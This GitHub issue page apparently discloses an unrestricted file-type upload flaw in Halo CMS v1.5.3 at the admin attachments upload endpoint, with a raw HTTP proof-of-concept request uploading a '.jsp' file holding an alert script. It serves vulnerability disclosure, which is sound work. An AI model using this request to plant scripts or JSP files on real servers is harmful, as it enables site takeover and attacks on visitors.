Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload #1

Open
zongdeiqianxing opened this issue Jun 6, 2022 · 0 comments

Comments

@zongdeiqianxing
Copy link
Owner

zongdeiqianxing commented Jun 6, 2022

https://github.com/halo-dev/halo/

Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload. Attackers can upload files in formats such as jsp、html etc.

Proof of Concept

POST /api/admin/attachments/upload HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 219
Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFxTUuVBMVJqfHQHX
Origin: http://127.0.0.1:8090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node04b75v93fl79m6b5ujcpwcvp82.node0
Connection: close

------WebKitFormBoundaryFxTUuVBMVJqfHQHX
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: application/octet-stream

1<script>alert(1)</script>
------WebKitFormBoundaryFxTUuVBMVJqfHQHX--

image
image

permalink: AttachmentServiceImpl.java L110
Security is not checked in the relevant code
image

@zongdeiqianxing zongdeiqianxing changed the title Halo cms v1.5.2 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload Jun 6, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant